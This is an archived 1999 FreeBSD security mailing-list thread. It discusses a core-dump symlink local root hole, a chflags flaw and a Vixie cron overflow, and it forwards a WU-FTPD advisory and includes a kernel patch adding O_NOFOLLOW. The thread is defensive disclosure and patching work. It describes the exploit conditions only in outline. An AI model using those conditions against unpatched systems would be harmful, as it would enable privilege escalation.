<199908271214.JAA00774@ns1.sminter.com.ar>; from Fernando Schapachnik on Fri, Aug 27, 1999 at 09:14:22AM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Aug 27, 1999 at 09:14:22AM -0300, Fernando Schapachnik wrote: > Patches for 2.2.8 are too much asking? Yes - 2.2.8 doesn't have the problem (AFAIK, at least - feel free to test it if you have easy access and time). Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 7: 1:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id CFA1A154D7; Fri, 27 Aug 1999 07:01:18 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id KAA19431; Fri, 27 Aug 1999 10:58:19 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199908271358.KAA19431@ns1.sminter.com.ar> Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] In-Reply-To: <19990827142016.U79110@bitbox.follo.net> from Eivind Eklund at "Aug 27, 99 02:20:16 pm" To: eivind@FreeBSD.ORG (Eivind Eklund) Date: Fri, 27 Aug 1999 10:58:18 -0300 (GMT) Cc: fpscha@via-net-works.net.ar, dima@best.net, imp@village.org, gsutter@pobox.com, security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Eivind Eklund escribió: > On Fri, Aug 27, 1999 at 09:14:22AM -0300, Fernando Schapachnik wrote: > > Patches for 2.2.8 are too much asking? > > Yes - 2.2.8 doesn't have the problem (AFAIK, at least - feel free to > test it if you have easy access and time). No problem. Is there a known test case anywhere I can grabb? Regards. Fernando P. Schapachnik Administración de la red VIA Net Works Argentina SA Diagonal Roque Sáenz Peña 971, 4º y 5º piso. 1035 - Capital Federal, Argentina. (54-11) 4323-3333 http://www.via-net-works.net.ar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 7: 8:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from isds.duke.edu (davinci.isds.duke.edu [152.3.22.1]) by hub.freebsd.org (Postfix) with ESMTP id 7DAA9154D7 for ; Fri, 27 Aug 1999 07:08:29 -0700 (PDT) (envelope-from sto@stat.Duke.EDU) Received: from cayenne.isds.duke.edu (cayenne.isds.duke.edu [152.3.22.11]) by isds.duke.edu (8.8.8/8.8.8) with ESMTP id KAA15509 for ; Fri, 27 Aug 1999 10:08:08 -0400 (EDT) Received: (from sto@localhost) by cayenne.isds.duke.edu (8.8.8/8.8.8) id KAA29829 for freebsd-security@FreeBSD.ORG; Fri, 27 Aug 1999 10:08:08 -0400 (EDT) Message-ID: <19990827100807.P28256@stat.Duke.EDU> Date: Fri, 27 Aug 1999 10:08:07 -0400 From: "Sean O'Connell" To: FreeBSD security Subject: Chflags vulnerability in FreeBSD? Reply-To: "Sean O'Connell" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2 X-Organization: Institute of Statistics and Decision Sciences Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi All- I received the following from SANS (www.sans.org) and it initimated that there is a vulnerability in FreeBSD that had previously been thought to only exist in BSDi: SANS Security Digest Vol. 3 Num. 8 A) 08/05/1999 - BSDI released a security patch for the chflags problem. The vulnerability exists in 4.0.1 and 3.1. BSDI continues to investigate the problem to ensure all possible security concerns are addressed. For more information see: http://www.BSDI.COM/support/patches/patches-4.0.1/M401-014.info http://www.BSDI.COM/support/patches/patches-3.1/M310-056.info The followup: SANS Digest EXTRA -- Vol. 3 Num. 8a 4) In item 10, BSDI A of the Augusts SANS Security Digest, we reported the chflags problem as a BSDI-specific problem, when in fact other versions of BSD kernel are effected as well as some programs (e.g., ssh) based on the same routine. Vendor specific information can be found at: http://www.BSDI.COM/support/patches/patches-4.0.1/M401-014.info http://www.BSDI.COM/support/patches/patches-3.1/M310-056.info http://www.ssh.fi/sshprotocols2/ http://www.openbsd.org/errata.html#chflags Also, according to a Bugtraq posting by Adam Morrison on 08/01/1999, NetBSD has corrected the problem and FreeBSD appears to be vulnerable. The SANS Digest editors were unable to locate an FreeBSD specific information regarding this problem. Has this been addressed or fixed? If it exists, it should probably be fixed before 3.3 gets out the door. Thanks S -- ----------------------------------------------------------------------- Sean O'Connell Email: sean@stat.Duke.EDU Institute of Statistics and Decision Sciences Phone: (919) 684-5419 Duke University Fax: (919) 684-8594 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 7:12:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 6194B14D8B; Fri, 27 Aug 1999 07:12:32 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id QAA07885; Fri, 27 Aug 1999 16:12:07 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id QAA38304; Fri, 27 Aug 1999 16:12:07 +0200 (MET DST) Date: Fri, 27 Aug 1999 16:12:07 +0200 From: Eivind Eklund To: Fernando Schapachnik Cc: dima@best.net, imp@village.org, gsutter@pobox.com, security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] Message-ID: <19990827161206.W79110@bitbox.follo.net> References: <19990827142016.U79110@bitbox.follo.net> <199908271358.KAA19431@ns1.sminter.com.ar> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.95.1i In-Reply-To: <199908271358.KAA19431@ns1.sminter.com.ar>; from Fernando Schapachnik on Fri, Aug 27, 1999 at 10:58:18AM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Aug 27, 1999 at 10:58:18AM -0300, Fernando Schapachnik wrote: > En un mensaje anterior, Eivind Eklund escribió: > > On Fri, Aug 27, 1999 at 09:14:22AM -0300, Fernando Schapachnik wrote: > > > Patches for 2.2.8 are too much asking? > > > > Yes - 2.2.8 doesn't have the problem (AFAIK, at least - feel free to > > test it if you have easy access and time). > > No problem. Is there a known test case anywhere I can grabb? The exploit :) However, looking more carefully, I note we were discussing a different vulnerability than the one I thought. This one is in 2.2, too, I think :-( Sorry. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 7:18:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id B845614D99 for ; Fri, 27 Aug 1999 07:18:34 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id QAA07960; Fri, 27 Aug 1999 16:18:15 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id QAA38401; Fri, 27 Aug 1999 16:18:14 +0200 (MET DST) Date: Fri, 27 Aug 1999 16:18:14 +0200 From: Eivind Eklund To: "Sean O'Connell" Cc: FreeBSD security Subject: Re: Chflags vulnerability in FreeBSD? Message-ID: <19990827161814.X79110@bitbox.follo.net> References: <19990827100807.P28256@stat.Duke.EDU> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <19990827100807.P28256@stat.Duke.EDU>; from Sean O'Connell on Fri, Aug 27, 1999 at 10:08:07AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Aug 27, 1999 at 10:08:07AM -0400, Sean O'Connell wrote: > Hi All- > > I received the following from SANS (www.sans.org) and it initimated > that there is a vulnerability in FreeBSD that had previously been > thought to only exist in BSDi: > SANS Digest EXTRA -- Vol. 3 Num. 8a > > 4) In item 10, BSDI A of the Augusts SANS Security Digest, we reported > the chflags problem as a BSDI-specific problem, when in fact other > versions of BSD kernel are effected as well as some programs (e.g., > ssh) based on the same routine. Vendor specific information can be > found at: > http://www.BSDI.COM/support/patches/patches-4.0.1/M401-014.info > http://www.BSDI.COM/support/patches/patches-3.1/M310-056.info > http://www.ssh.fi/sshprotocols2/ > http://www.openbsd.org/errata.html#chflags > Also, according to a Bugtraq posting by Adam Morrison on 08/01/1999, > NetBSD has corrected the problem and FreeBSD appears to be vulnerable. > The SANS Digest editors were unable to locate an FreeBSD specific > information regarding this problem. > > Has this been addressed or fixed? If it exists, it should probably > be fixed before 3.3 gets out the door. It has been fixed, and had been fixed the day the posting was approved for bugtraq (of course, the bugtraq editors then spent 4-5 days before approving the postings pointing this out). SANS has not done any serious attempt to get information - there has, for instance, not come any mail from them to security-officer@FreeBSD.org. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 7:54:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id AE77D14C3E; Fri, 27 Aug 1999 07:54:20 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id IAA89647; Fri, 27 Aug 1999 08:54:16 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id IAA73613; Fri, 27 Aug 1999 08:55:42 -0600 (MDT) Message-Id: <199908271455.IAA73613@harmony.village.org> To: Eivind Eklund Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Fri, 27 Aug 1999 16:12:07 +0200." <19990827161206.W79110@bitbox.follo.net> References: <19990827161206.W79110@bitbox.follo.net> <19990827142016.U79110@bitbox.follo.net> <199908271358.KAA19431@ns1.sminter.com.ar> Date: Fri, 27 Aug 1999 08:55:42 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990827161206.W79110@bitbox.follo.net> Eivind Eklund writes: : The exploit :) However, looking more carefully, I note we were : discussing a different vulnerability than the one I thought. This one : is in 2.2, too, I think :-( I've recieved reports of that as well. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 8:51: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 7E0071530C for ; Fri, 27 Aug 1999 08:51:05 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.veriohosting.com; Fri, 27 Aug 1999 09:51:04 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma028942; Fri, 27 Aug 99 09:50:43 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id JAA08996; Fri, 27 Aug 1999 09:49:50 -0600 (MDT) Date: Fri, 27 Aug 1999 09:49:50 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: freebsd-security@FreeBSD.ORG Subject: Re: Buffer overflow in vixie cron? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 26 Aug 1999, Paul Hart wrote: > Our code already uses snprintf when using the MAILTO value, but the > original Vixie cron used sprintf without length checks in both version > 3.0 and 3.0.1. I'm assuming that's where the hole was. I take that back. On closer inspection, the Red Hat patch fixes an overflow in cron_popen() in the for loop where the command string is broken down into tokens to make an argv[] array. In the original version, Vixie cron does not keep track of how many tokens it has extracted from the command string and it looks like it will happily overwrite past the end of the stack buffer where it keeps the array it's making. Again, cron in FreeBSD appears to have already fixed this hole (yay!) but the hole appears not to have been as obvious as a string overflow. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 10: 0:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from inet.chip-web.com (c1003518-a.plstn1.sfba.home.com [24.1.82.47]) by hub.freebsd.org (Postfix) with SMTP id 265D215F18 for ; Fri, 27 Aug 1999 10:00:29 -0700 (PDT) (envelope-from ludwigp@bigfoot.com) Received: (qmail 4945 invoked from network); 27 Aug 1999 17:00:49 -0000 Received: from furball.chip-web.com (HELO bigfoot.com) (172.16.1.29) by inet.chip-web.com with SMTP; 27 Aug 1999 17:00:49 -0000 Message-ID: <37C6C42E.78E600F4@bigfoot.com> Date: Fri, 27 Aug 1999 10:00:30 -0700 From: Ludwig Pummer X-Mailer: Mozilla 4.61 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Eivind Eklund Cc: Fernando Schapachnik , freebsd-security@FreeBSD.ORG Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] References: <199908261758.KAA94925@burka.rdy.com> <199908271214.JAA00774@ns1.sminter.com.ar> <19990827142016.U79110@bitbox.follo.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Eivind Eklund wrote: > > On Fri, Aug 27, 1999 at 09:14:22AM -0300, Fernando Schapachnik wrote: > > Patches for 2.2.8 are too much asking? > > Yes - 2.2.8 doesn't have the problem (AFAIK, at least - feel free to > test it if you have easy access and time). It was pointed out yesterday that 3 conditions need to be present for this to be exploitable, and 2.2.8 doesn't have at least one of the conditions (core dump won't follow symlinks in 2.2.8). --Ludwig Pummer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 14:48:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 1F4C4155D1 for ; Fri, 27 Aug 1999 14:47:38 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA90905; Fri, 27 Aug 1999 15:47:23 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id PAA76221; Fri, 27 Aug 1999 15:48:52 -0600 (MDT) Message-Id: <199908272148.PAA76221@harmony.village.org> To: "Sean O'Connell" Subject: Re: Chflags vulnerability in FreeBSD? Cc: FreeBSD security In-reply-to: Your message of "Fri, 27 Aug 1999 10:08:07 EDT." <19990827100807.P28256@stat.Duke.EDU> References: <19990827100807.P28256@stat.Duke.EDU> Date: Fri, 27 Aug 1999 15:48:52 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990827100807.P28256@stat.Duke.EDU> "Sean O'Connell" writes: : I received the following from SANS (www.sans.org) and it initimated : that there is a vulnerability in FreeBSD that had previously been : thought to only exist in BSDi: Been there, fixed that. I'm waiting to get my account on ftp.cdrom.com to issue the advisory. I'd post a copy of it, but that would cause more problems that it will solve. SANS has been notified. They didn't read enough bugtraq before putting that message out, since a couple of messages subsequently in the thread set the record state. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 14:51:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 7F42D155CE; Fri, 27 Aug 1999 14:51:44 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA90909; Fri, 27 Aug 1999 15:49:57 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id PAA76238; Fri, 27 Aug 1999 15:51:27 -0600 (MDT) Message-Id: <199908272151.PAA76238@harmony.village.org> To: Eivind Eklund Subject: Re: Chflags vulnerability in FreeBSD? Cc: "Sean O'Connell" , FreeBSD security In-reply-to: Your message of "Fri, 27 Aug 1999 16:18:14 +0200." <19990827161814.X79110@bitbox.follo.net> References: <19990827161814.X79110@bitbox.follo.net> <19990827100807.P28256@stat.Duke.EDU> Date: Fri, 27 Aug 1999 15:51:27 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990827161814.X79110@bitbox.follo.net> Eivind Eklund writes: : SANS has not done any serious attempt to get information - there has, : for instance, not come any mail from them to : security-officer@FreeBSD.org. I notified SANS and they appologized for their oversite. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 14:52:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 35BD1156CB for ; Fri, 27 Aug 1999 14:52:08 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA90920; Fri, 27 Aug 1999 15:51:14 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id PAA76258; Fri, 27 Aug 1999 15:52:44 -0600 (MDT) Message-Id: <199908272152.PAA76258@harmony.village.org> To: Ludwig Pummer Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Fri, 27 Aug 1999 10:00:30 PDT." <37C6C42E.78E600F4@bigfoot.com> References: <37C6C42E.78E600F4@bigfoot.com> <199908261758.KAA94925@burka.rdy.com> <199908271214.JAA00774@ns1.sminter.com.ar> <19990827142016.U79110@bitbox.follo.net> Date: Fri, 27 Aug 1999 15:52:43 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <37C6C42E.78E600F4@bigfoot.com> Ludwig Pummer writes: : It was pointed out yesterday that 3 conditions need to be present for : this to be exploitable, and 2.2.8 doesn't have at least one of the : conditions (core dump won't follow symlinks in 2.2.8). Others have pointed out to me that 2.x will, indeed, follow symlinks. I don't have a system handy that I can test on (all my 2.x systems have core dumps turned off completely because they are on ultra-tiny disks). Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 15: 4:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (Postfix) with ESMTP id 60FE11557D for ; Fri, 27 Aug 1999 15:04:42 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.9.3/RDY&DVV) id PAA09830; Fri, 27 Aug 1999 15:04:19 -0700 (PDT) Message-Id: <199908272204.PAA09830@burka.rdy.com> Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] In-Reply-To: <199908272152.PAA76258@harmony.village.org> from Warner Losh at "Aug 27, 1999 03:52:43 pm" To: imp@village.org (Warner Losh) Date: Fri, 27 Aug 1999 15:04:19 -0700 (PDT) Cc: ludwigp@bigfoot.com (Ludwig Pummer), freebsd-security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh writes: > In message <37C6C42E.78E600F4@bigfoot.com> Ludwig Pummer writes: > : It was pointed out yesterday that 3 conditions need to be present for > : this to be exploitable, and 2.2.8 doesn't have at least one of the > : conditions (core dump won't follow symlinks in 2.2.8). > > Others have pointed out to me that 2.x will, indeed, follow symlinks. > I don't have a system handy that I can test on (all my 2.x systems > have core dumps turned off completely because they are on ultra-tiny > disks). That was exactly my problem (coredump are disabled). Sorry about that. RELENG_2_2 is indeed vulnerable, and the patch is ready. As soon as I get a review, I'll commit it. Patch is attached. > > Warner > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- dima *** sys/LINK/fcntl.h Wed Dec 18 05:08:08 1996 --- sys/fcntl.h Fri Aug 27 14:39:26 1999 *************** *** 84,89 **** --- 84,90 ---- #define O_EXLOCK 0x0020 /* open with exclusive file lock */ #define O_ASYNC 0x0040 /* signal pgrp when data ready */ #define O_FSYNC 0x0080 /* synchronous writes */ + #define O_NOFOLLOW 0x0100 /* don't follow symlinks */ #endif #define O_CREAT 0x0200 /* create if nonexistent */ #define O_TRUNC 0x0400 /* truncate to zero length */ *** kern/LINK/kern_sig.c Sat Dec 21 10:57:24 1996 --- kern/kern_sig.c Fri Aug 27 14:38:25 1999 *************** *** 1241,1249 **** p->p_rlimit[RLIMIT_CORE].rlim_cur) return (EFAULT); sprintf(name, "%s.core", p->p_comm); ! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); if ((error = vn_open(&nd, ! O_CREAT | FWRITE, S_IRUSR | S_IWUSR))) return (error); vp = nd.ni_vp; --- 1241,1249 ---- p->p_rlimit[RLIMIT_CORE].rlim_cur) return (EFAULT); sprintf(name, "%s.core", p->p_comm); ! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); if ((error = vn_open(&nd, ! O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR))) return (error); vp = nd.ni_vp; *** kern/LINK/vfs_vnops.c Sat Mar 8 07:16:18 1997 --- kern/vfs_vnops.c Fri Aug 27 14:37:01 1999 *************** *** 87,93 **** if (fmode & O_CREAT) { ndp->ni_cnd.cn_nameiop = CREATE; ndp->ni_cnd.cn_flags = LOCKPARENT | LOCKLEAF; ! if ((fmode & O_EXCL) == 0) ndp->ni_cnd.cn_flags |= FOLLOW; error = namei(ndp); if (error) --- 87,93 ---- if (fmode & O_CREAT) { ndp->ni_cnd.cn_nameiop = CREATE; ndp->ni_cnd.cn_flags = LOCKPARENT | LOCKLEAF; ! if ((fmode & O_EXCL) == 0 && (fmode & O_NOFOLLOW) == 0) ndp->ni_cnd.cn_flags |= FOLLOW; error = namei(ndp); if (error) *************** *** 119,125 **** } } else { ndp->ni_cnd.cn_nameiop = LOOKUP; ! ndp->ni_cnd.cn_flags = FOLLOW | LOCKLEAF; error = namei(ndp); if (error) return (error); --- 119,126 ---- } } else { ndp->ni_cnd.cn_nameiop = LOOKUP; ! ndp->ni_cnd.cn_flags = ! ((fmode & O_NOFOLLOW) ? NOFOLLOW : FOLLOW) | LOCKLEAF; error = namei(ndp); if (error) return (error); To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 28 9:17:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 6A05E14D62; Sat, 28 Aug 1999 09:17:13 -0700 (PDT) (envelope-from mike@sentex.net) Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id MAA21365; Sat, 28 Aug 1999 12:17:06 -0400 (EDT) Message-Id: <4.1.19990828122706.04dd8780@granite.sentex.ca> X-Sender: mdtancsa@granite.sentex.ca X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Sat, 28 Aug 1999 12:30:10 -0400 To: security@freebsd.org From: Mike Tancsa Subject: Fwd: WU-FTPD Security Update Cc: ache@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just in case this went missed by those not on bugtraq ---Mike >Return-Path: owner-bugtraq@SECURITYFOCUS.COM >Received: from lists.securityfocus.com (lists.securityfocus.com >[216.102.46.4]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id GAA15301 >for ; Sat, 28 Aug 1999 06:31:37 -0400 (EDT) >Received: (qmail 16602 invoked from network); 28 Aug 1999 04:18:12 -0000 >Received: from lists.securityfocus.com (216.102.46.4) > by lists.securityfocus.com with SMTP; 28 Aug 1999 04:18:12 -0000 >Received: from LISTS.SECURITYFOCUS.COM by LISTS.SECURITYFOCUS.COM > (LISTSERV-TCP/IP release 1.8d) with spool id 932192 for > BUGTRAQ@LISTS.SECURITYFOCUS.COM; Fri, 27 Aug 1999 21:14:40 -0700 >Approved-By: aleph1@SECURITYFOCUS.COM >Received: from securityfocus.com (216.102.46.2) by lists.securityfocus.com with > SMTP; 26 Aug 1999 17:56:16 -0000 >Received: (qmail 10732 invoked by alias); 26 Aug 1999 17:56:16 -0000 >Delivered-To: BUGTRAQ@SECURITYFOCUS.COM >Received: (qmail 10728 invoked from network); 26 Aug 1999 17:56:15 -0000 >Received: from pop02.iname.net (HELO pop02.prod) (165.251.20.34) by > securityfocus.com with SMTP; 26 Aug 1999 17:56:15 -0000 >Received: from yua (cieem35.cieem.rpi.edu [128.113.60.128]) by pop02.prod > (8.9.1/8.8.0) with SMTP id NAA15291 for ; > Thu, 26 Aug 1999 13:53:44 -0400 (EDT) >MIME-Version: 1.0 >Content-Type: text/plain; charset="Windows-1252" >Content-Transfer-Encoding: 7bit >X-Priority: 3 (Normal) >X-MSMail-Priority: Normal >X-Mailer: Mutt 0.95.6i >X-From_: owner-wuftpd-members@wu-ftpd.org Thu Aug 26 12:07:11 1999 >Importance: Normal >X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 >Message-ID: >Date: Thu, 26 Aug 1999 13:43:07 -0400 >Reply-To: WU-FTPD Development Group >Sender: Bugtraq List >From: Alex Yu >Subject: WU-FTPD Security Update >X-To: BUGTRAQ@SECURITYFOCUS.COM >To: BUGTRAQ@SECURITYFOCUS.COM >X-UIDL: 23cfe0ddeeacd4b120756724b083f31f > >-----BEGIN PGP SIGNED MESSAGE----- > > WU-FTPD Security Update > >The WU-FTPD Development Group has been informed there is a vulnerability in >some versions of wu-ftpd. > >This vulnerability may allow local & remote users to gain root privileges. > >Exploit information involving this vulnerability has been made publicly >available. > >The WU-FTPD Development Group recommends sites take the steps outlined >below as soon as possible. > >1. Description > > Due to insufficient bounds checking on directory name lengths which can > be supplied by users, it is possible to overwrite the static memory > space of the wu-ftpd daemon while it is executing under certain > configurations. By having the ability to create directories and > supplying carefully designed directory names to the wu-ftpd, users may > gain privileged access. > >2. Impact > > This vulnerability may allow local & remote users to gain root > privileges. > >3. Workarounds/Solution > > Sites may prevent the exploitation of the vulnerability in wu-ftpd by > immediately upgrading and applying available patches. > >3.1 Affected versions > > Versions known to be effected are: > > wu-ftpd-2.4.2-beta-18-vr4 through wu-ftpd-2.4.2-beta-18-vr15 > wu-ftpd-2.4.2-vr16 and wu-ftpd-2.4.2-vr17 > wu-ftpd-2.5.0 > > BeroFTPD, all present versions > > Other derivatives of wu-ftpd may be effected. See the workarrounds > (section 3.3) to determine if a derivative is vulnerable. > > Versions know to be not effected are: > > NcFTPd, all versions. > wu-ftpd-2.4.2 (final, from Academ) > All Washington University versions. > > (Please note: ALL versions of WU-FTPD prior to > wu-ftpd-2.4.2-beta-18-vr10 including all WU versions, and all > Academ 2.4.1 and 2.4.2 betas, are vulnerable to a remote user > root-leveraging attack. See CERT Advisory CA-99-03 'FTP Buffer > Overflows' at > http://www.cert.org/advisories/CA-99-03-FTP-Buffer-Overflows.html > and section 3.2) > >3.2 Upgrade to latest wu-ftpd and apply patch > > The latest version of wu-ftpd from the WU-FTPD Development Group is > 2.5.0; sites running earlier versions should upgrade to this version as > soon as possible. > > The WU-FTPD Development Group has a patch available which corrects this > vulnerabililty. The patch is available directly from the WU-FTPD > Development Group's primary distribution site, and will be propogating > to its mirrors shortly. > > Several other patches to version 2.5.0 are also available. The WU-FTPD > Development Group recommends all available patches be applied. > > Patches for version 2.5.0 are available at the primary distribution > site: > > 